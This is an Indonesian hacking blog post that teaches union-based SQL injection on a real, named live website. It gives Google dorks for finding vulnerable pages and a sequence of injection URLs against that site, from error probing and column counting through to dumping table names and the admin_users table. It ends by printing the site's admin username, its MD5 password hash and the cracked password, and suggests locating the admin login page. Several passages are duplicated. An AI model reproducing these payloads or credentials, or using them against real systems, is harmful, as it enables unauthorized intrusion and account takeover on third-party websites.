Apa itu SQL Injection?
Sql injection adalah sebuah teknik hacking yang dilakukan dengan menyisipkan baris kode SQL pada kotak isian (misalnya form login) atau pada url yang mana serangan ini akan mempengaruhi logika dari website tersebut.
Ok jadi itu sedikit pengertian mengenai SQL Injection dan sekarang kita akan mempraktekkannya :v
1.Dork:
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
(Kembangin lagi gan)
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
(Kembangin lagi gan)
Disini gw udah kasih live target ya mhankk biar lu bisa nyoba nyoba ea :v
Live target: http://www.tnla.com/events.php?id=13
1.Pertama kita cek websitenya vuln atau ngga dengan cara menambahkan string di angka (')
http://www.tnla.com/events.php?id=13'
Kalo vuln pasti ada tulisan:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '.' limit 1' at line 1
tapi ngga cuma tulisan biasanya ada juga yang ngeblank atau ada gambar yang hilang(masih banyak lgi error nya)
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '.' limit 1' at line 1
tapi ngga cuma tulisan biasanya ada juga yang ngeblank atau ada gambar yang hilang(masih banyak lgi error nya)
2.Setelah itu kita mencari dan menghitung jumlah tabel yang ada di database web tersebut dengan cara +order+by+
http://www.tnla.com/events.php?id=13+order+by+1--+-
(Ngga error)
http://www.tnla.com/events.php?id=13+order+by+2--+-
(Ngga error)
http://www.tnla.com/events.php?id=13+order+by+3--+-
(Error)
Nah disini kita menemukan kalau error nya ada di angka 3 brarti jumlah table nya cuma ada 2
3.Lalu kita cari angka togel nya dengan cara +union+select
http://www.tnla.com/events.php?id=13+union+select+1,2--+-
nah disini bisa kita lihat muncul angka 2 brarti itu angka togelnya π
Fungsi angka togelnya nanti buat kita inject nya gan
4.Setelah ketemu angka togelnya kita lihat dulu versi berapa dengan cara @@version
http://www.tnla.com/events.php?id=13+union+select+1,@@version--+-
Bisa kita lihat kalau versi 5.7.28
nah fungsinya melihat versinya karena kalau versi 4 ke bawah nanti ribet gan soalnya di versi 4 kita harus menebak 1 per 1 tabel yang ada pada databasenya
5.Setelah melihat versinya kita munculin databasenya gunakan perintah
group_concat(table_name)
Dan menambahkan
from+information_schema.tables+where+table_schema=database()
Sesudah angka terahkir
Karena disini live targetnya tabel cuma 2 dan angka togelnya di angka 2 maka seperti ini
http://www.tnla.com/events.php?id=13+union+select+1,group_concat(table_name)from+information_schema.tables+where+table_schema=database()--+-
group_concat(table_name)
Dan menambahkan
from+information_schema.tables+where+table_schema=database()
Sesudah angka terahkir
Karena disini live targetnya tabel cuma 2 dan angka togelnya di angka 2 maka seperti ini
http://www.tnla.com/events.php?id=13+union+select+1,group_concat(table_name)from+information_schema.tables+where+table_schema=database()--+-
Nah disitu bisa kita lihat kalau banyak nama nama tabel nya
ad,admin_settings,admin_users
dan masih banyak lagi tabelnya
6.Langkah selanjutnya kita mencari Username dan Password yang ada di tabel tersebut. Nah di situ nama tabelnya admin_users
Perlu diketahui nama tabel adminnya tidaklah sama,maka sobat harus menebak di mana yang menurut sobat curigai username dan password admin berada
Nah disini gw make dios aja gan :" biar mudah.
Dios:
concat_ws(0x3a,username,password)from+admin_users--+-
(ganti admin_users dengan tabel yang kalian temukan untuk user password admin)
http://www.tnla.com/events.php?id=13+union+select+1,concat_ws(0x3a,username,password)from+admin_users--+-
7.Ok dari situ keluar user passwordnya gan
user:admin
password:c2d0d2b7bf75a11ad8dbcd87e082a842
Nah itu hash MD5 kita bisa hash di
setelah di hash maka ketemu hasil hash nya
sebelum di hash:c2d0d2b7bf75a11ad8dbcd87e082a842
setelah di hash:01nursery
8.Nah setelah menemukan username dan password adminnya kita harus mencari halaman login / tempat login adminnya kalian bisa menggunakan tools online admin finder di google banyak ganπ
Ok sekian dulu dari saya.Jangan katakan sulit lah gabisa lah intinya kalo kita mau belajar sungguh sungguh dan niat pasti bisa secara perlahan-lahan,jadi buat kalian tetap semangat gan perlahan kalian pasti bisa..
Author:NJ404NF
Greets:TroubleMaker Crew
Tidak ada komentar:
Posting Komentar